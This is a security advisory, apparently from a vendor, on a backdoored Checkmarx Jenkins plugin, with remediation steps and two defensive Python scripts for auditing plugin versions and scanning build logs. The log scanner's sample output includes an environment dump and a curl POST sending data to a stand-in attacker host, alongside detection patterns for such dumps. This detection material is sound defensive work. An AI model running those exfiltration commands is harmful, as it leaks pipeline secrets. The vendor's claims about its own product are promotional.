CVE-2026-33634: TeamPCP Backdoors Checkmarx Jenkins Plugin — CRITICAL RCE in DevOps Pipelines
TL;DR
Notorious supply-chain group TeamPCP has compromised the Checkmarx Jenkins AST plugin, publishing a backdoored version (2026.5.09) to the official Jenkins Marketplace. Jenkins instances with the malicious plugin are running attacker code with full access to CI/CD secrets, cloud credentials, SSH keys, and source repositories. CVSS 9.4 CRITICAL.
What Happened
On May 10-12, 2026, TeamPCP gained unauthorized access to Checkmarx's Jenkins AST plugin GitHub repository and published a trojanized release. The attacker:
1. Renamed the repository to "Checkmarx-Fully-Hacked-by-TeamPCP-and-Their-Customers-Should-Cancel-Now"
2. Modified the repository description to read: "Checkmarx fails to rotate secrets again. with love – TeamPCP"
3. Published malicious version 2026.5.09 to the official Jenkins Marketplace with embedded backdoor code
4. Defaced artifact repositories with Dune-themed project names (kralizec-navigator-709, mentat-navigator-124) using the signature "A Mini Shai-Hulud has Appeared"
Checkmarx released emergency fixes (version 2.0.13-848.v76e89de8a_053) but notes that the Jenkins Marketplace version remained compromised as of publication. Any Jenkins instance that installed the malicious version now has a persistent backdoor with privileged access to the CI/CD environment.
Technical Details
Affected Versions:
- Vulnerable: Jenkins AST plugin version 2026.5.09
- Last safe version: 2.0.13-829.vc72453fa_1c16 (released December 17, 2025)
- Fixed version: 2.0.13-848.v76e89de8a_053 (available on GitHub and Jenkins Marketplace, but timing and completeness unclear)
Attack Chain:
The plugin runs inside Jenkins with access to:
- Build artifacts and source code repositories
- All environment variables (GitHub tokens, cloud credentials: AWS/GCP/Azure keys)
- Kubernetes configurations and Docker credentials
- SSH private keys stored in Jenkins secrets
- Outbound network access from the CI/CD pipeline
The presence of Dune-themed repository names suggests this backdoor is connected to the broader "Mini Shai-Hulud" supply-chain worm campaign that has hit TanStack, npm ecosystem packages, Bitwarden CLI, and others since March 2026.
CVE Details:
- ID: CVE-2026-33634
- CVSS Score: 9.4 (CRITICAL)
- Impact: remote code execution, lateral movement, credential harvesting
Lyrie Assessment
This attack is urgent for every enterprise running Jenkins with the Checkmarx AST plugin, and it exposes a structural weakness in the software supply chain: vendor integrations and marketplace reviews only validate what a publisher ships, so an attacker who controls the publishing infrastructure bypasses all of them.
For Lyrie's customers:
1. CI/CD Compromise = Game Over: Unlike a compromised npm package that affects downstream consumers, a backdoored Jenkins plugin grants the attacker immediate, privileged code execution in your deployment pipeline — the keys to your kingdom.
2. Incomplete Rotation Risk: Checkmarx's incident note "in the process of publishing" suggests a delayed response. If your Jenkins ran the malicious version for even hours, all secrets visible to the runner are now exposed. Partial secret rotation is not enough; assume full compromise of any credentials touched during the window of exposure.
3. Persistence Indicator: This is TeamPCP's second strike at Checkmarx in under two months (March 2026: KICS + GitHub Actions + Bitwarden CLI). The group either:
- Retained a dormant foothold from the first breach, or
- Has identified and exploited incomplete remediation practices
Either way, this suggests ongoing access to Checkmarx infrastructure and heightened risk of future attacks.
4. Developer Endpoint Hunting: As Techzine noted, TeamPCP's wider campaign (66+ npm packages, 1000+ SaaS environments compromised) specifically targets developer endpoints for cloud credentials, publishing tokens, and SSH keys. This Jenkins plugin is the crown jewel — it runs in trusted infrastructure where secrets are expected to be available.
5. Autonomous Defense Angle: This incident is a masterclass in why runtime behavior monitoring in CI/CD is non-negotiable. A plugin that suddenly exfiltrates environment variables, makes unexpected outbound connections, or spawns reverse shells should be flagged and isolated immediately. Lyrie's autonomous threat detection in DevOps pipelines would have caught the anomalous behavior of the backdoor in seconds, not weeks.
Recommended Actions
Immediate (Next 24 Hours)
1. Audit Jenkins plugins: Run curl http://your-jenkins:8080/pluginManager/api/json (authenticated as a Jenkins user) and check whether the Checkmarx AST plugin is installed at version 2026.5.09, or at any version other than the last safe and fixed builds listed above. Check Jenkins Marketplace installation logs.
2. Isolate and patch: If found, immediately uninstall the plugin. Update to version 2.0.13-848.v76e89de8a_053 from the official Jenkins website (the GitHub source is also safe; the Jenkins Marketplace may still serve the compromised version).
3. Full secret rotation: Rotate ALL secrets that were accessible to Jenkins runners during the exposure window:
- GitHub tokens and deploy keys
- AWS/GCP/Azure service accounts
- Kubernetes API tokens
- Docker registry credentials
- SSH private keys
- PyPI, npm publishing tokens
4. Examine build logs: Search Jenkins build logs for:
- Outbound connections to unknown domains
- Dune-themed strings (Shai-Hulud, kralizec, mentat)
- Unusual environment variable access or env command execution
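The plugin audit in step 1, worked through as an added example (this is not the advisory's own tooling nor Checkmarx's). It fetches the inventory from the pluginManager API endpoint named above and classifies each Checkmarx plugin against the versions the advisory lists. Assumptions: the plugin's Jenkins short name is "checkmarx-ast-scanner", and the JSON has the shape Jenkins returns for /pluginManager/api/json?depth=1 (a "plugins" array whose entries carry "shortName", "version" and "active"); the sample inventory at the bottom is constructed.

```python
"""Audit a Jenkins controller's plugin inventory for the backdoored
Checkmarx AST build. Added example, not code from the advisory."""
import base64
import json
import urllib.request

# Versions named in the advisory.
MALICIOUS_VERSION = "2026.5.09"
LAST_SAFE_VERSION = "2.0.13-829.vc72453fa_1c16"
FIXED_VERSION = "2.0.13-848.v76e89de8a_053"
PLUGIN_SHORT_NAME = "checkmarx-ast-scanner"  # assumed short name of the plugin


def fetch_plugin_inventory(base_url, user, api_token, timeout=10):
    """Download the plugin inventory from a Jenkins controller.

    Uses HTTP basic auth with a Jenkins API token; depth=1 makes Jenkins
    include per-plugin fields such as the installed version.
    """
    url = base_url.rstrip("/") + "/pluginManager/api/json?depth=1"
    creds = base64.b64encode(f"{user}:{api_token}".encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": "Basic " + creds})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


def audit_plugins(inventory):
    """Return (shortName, version, verdict) for every Checkmarx plugin found.

    verdict is one of:
      "MALICIOUS" - the backdoored 2026.5.09 build
      "FIXED"     - the emergency fix
      "SAFE"      - the last build released before the compromise
      "REVIEW"    - any other version; verify its provenance before trusting it
    """
    findings = []
    for plugin in inventory.get("plugins", []):
        name = plugin.get("shortName", "")
        if "checkmarx" not in name.lower():
            continue
        version = plugin.get("version", "")
        if version == MALICIOUS_VERSION:
            verdict = "MALICIOUS"
        elif version == FIXED_VERSION:
            verdict = "FIXED"
        elif version == LAST_SAFE_VERSION:
            verdict = "SAFE"
        else:
            verdict = "REVIEW"
        findings.append((name, version, verdict))
    return findings


def is_compromised(inventory):
    """True if the backdoored build is present in the inventory."""
    return any(v == "MALICIOUS" for _, _, v in audit_plugins(inventory))


# Constructed sample inventory, shaped like the Jenkins API response.
SAMPLE_INVENTORY = {
    "_class": "hudson.LocalPluginManager",
    "plugins": [
        {"shortName": "git", "version": "5.2.1", "active": True},
        {"shortName": PLUGIN_SHORT_NAME, "version": "2026.5.09", "active": True},
    ],
}

if __name__ == "__main__":
    for name, version, verdict in audit_plugins(SAMPLE_INVENTORY):
        print(f"{verdict:10} {name} {version}")
    # Live use against a real controller (needs a user API token):
    # inventory = fetch_plugin_inventory("http://your-jenkins:8080", "admin", "<token>")
    # print(is_compromised(inventory))
```

Anything reported as REVIEW is not necessarily bad, but a version that is neither the last safe build nor the fix should be traced back to a known-good release before the controller is trusted again.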
Short-term (1 Week)
5. Forensic investigation: Collect Jenkins logs, plugin telemetry, and network flows from March onward (when TeamPCP's campaign began). Determine the exact window of exposure.
6. Account audits: Check GitHub for unexpected commits, Actions workflow modifications, or repository renames involving your Checkmarx integration.
7. Downstream blast radius: If you used Checkmarx-scanned artifacts in your supply chain, assume they may have been compromised. Rescan with a clean Checkmarx instance and conduct integrity checks on deployed services.
Long-term (Ongoing)
8. CI/CD monitoring: Deploy runtime threat detection in Jenkins that flags:
- Unexpected environment variable access
- Outbound DNS/HTTP from plugins to unknown domains
- Plugin behavior anomalies (CPU spikes, large data transfers)
9. Plugin governance: Implement code review and signature verification for Jenkins plugins. Prefer official Jenkins-maintained plugins over community plugins. Pin versions and regularly audit for updates.
10. Supply-chain baseline: Establish baseline behavior for all CI/CD tools and plugins. Any deviation triggers immediate isolation and investigation.
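The build-log review in step 4 and the runtime checks in step 8 both come down to scanning console output for the same three indicator classes: the Dune-themed strings, wholesale environment dumps, and outbound connections to hosts outside an allowlist. The scanner below is an added example, not part of the advisory. The indicator strings are the advisory's; the log lines and the domain allowlist are constructed. A real run would read the per-build log files under the Jenkins home directory instead of the inline sample.

```python
"""Scan Jenkins console logs for the advisory's indicators.
Added example, not code from the advisory."""
import re

# Strings named in the advisory (matched case-insensitively).
DUNE_STRINGS = ("shai-hulud", "kralizec", "mentat")

# A bare env/printenv/set followed by end-of-line, a pipe or a redirect:
# the shape of a command that dumps the whole environment somewhere.
ENV_DUMP_RE = re.compile(r"(?:^|[\s;&|])(?:env|printenv|set)\s*(?:$|[|>])")

# Hostnames in URLs or in common client connection messages.
HOST_RE = re.compile(
    r"(?:https?://|Connecting to |connect to )([A-Za-z0-9.-]+\.[A-Za-z]{2,})", re.I
)


def scan_log(lines, allowed_domains):
    """Return (line_no, kind, detail) findings for a list of log lines.

    kind is "dune-string", "env-dump" or "unknown-host". A host counts as
    known if it equals an allowlisted domain or is a subdomain of one.
    """
    allowed = {d.lower() for d in allowed_domains}
    findings = []
    for n, line in enumerate(lines, 1):
        low = line.lower()
        for s in DUNE_STRINGS:
            if s in low:
                findings.append((n, "dune-string", s))
        if ENV_DUMP_RE.search(line):
            findings.append((n, "env-dump", line.strip()))
        for host in HOST_RE.findall(line):
            host = host.lower()
            if not any(host == d or host.endswith("." + d) for d in allowed):
                findings.append((n, "unknown-host", host))
    return findings


# Constructed sample console output; the hostnames are not real indicators.
SAMPLE_LOG = [
    "[Pipeline] sh",
    "+ env | base64 -w0",
    "+ curl -s https://artifacts.example.com/build/123/app.jar -o app.jar",
    "+ curl -X POST https://kralizec-navigator-709.invalid/collect -d @-",
    "A Mini Shai-Hulud has Appeared",
    "Finished: SUCCESS",
]
ALLOWED_DOMAINS = {"example.com"}  # constructed allowlist for the sample

if __name__ == "__main__":
    for line_no, kind, detail in scan_log(SAMPLE_LOG, ALLOWED_DOMAINS):
        print(f"line {line_no}: {kind}: {detail}")
```

The allowlist is the part that needs tuning per site: seed it from the registries, artifact stores and SCM hosts your pipelines legitimately contact, and treat every other host in a plugin's output as something to explain.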
Sources
1. The Hacker News: TeamPCP Compromises Checkmarx Jenkins AST Plugin
2. Techzine EU: Checkmarx Jenkins plugin compromised in new supply chain attack
3. Checkmarx Security Advisory
4. SOCRadar: Checkmarx Jenkins Plugin – TeamPCP Backdoor
5. GitHub Issue: TanStack Router #7383 (Mini Shai-Hulud context)
Lyrie.ai Cyber Research Division
Lyrie Verdict
Lyrie's autonomous defense layer flags this class of exposure the moment it surfaces — no signature update required.